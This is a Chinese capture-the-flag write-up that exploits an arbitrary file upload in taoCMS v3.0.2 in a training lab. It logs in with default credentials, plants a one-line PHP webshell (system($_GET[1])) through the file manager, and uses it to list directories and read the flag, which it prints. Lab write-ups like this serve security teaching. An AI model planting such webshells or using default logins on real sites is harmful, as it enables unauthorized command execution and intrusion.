简介
春秋云境免费靶场挑战。
靶场介绍:taoCMS v3.0.2 文件管理处存在任意文件上传漏洞,攻击者可执行任意代码。
详解
- 打开页面随便点点,发现点管理会跳到一个登录页面。
- 百度一下默认账户admin,密码tao。尝试登录可以登录。
- 提示文件上传漏洞,点击文件管理,发现可以编辑文件,还能上传或者新建文件。
- 尝试上传个简单webshell,对后缀名过滤了,上传不了php文件。
- 那就试试新建文件,发现可以。并且可以编辑。创建shell.php,然后编辑写入webshell。
<?php
system($_GET[1]);
?>
- 尝试访问,并传参ls /。
http://eci-2ze6sij0ebixzvz39rhw.cloudeci1.ichunqiu.com/shell.php?1=ls%20/
页面显示:bin boot dev etc flag home lib lib64 media mnt opt proc root run sbin srv sys tmp usr var
- 有个flag,尝试传参cat /flag。
http://eci-2ze6sij0ebixzvz39rhw.cloudeci1.ichunqiu.com/shell.php?1=cat%20/flag
- 成功获取到flag----
flag{bcb7f369-2cd6-47ad-b522-591ce2bbd0bb}
结语
虽然获取到flag,但是后知后觉应该不需要创建文件,编辑已有文件直接写入webshell也可以。
尝试在install.php中写入webshell发现还真可以。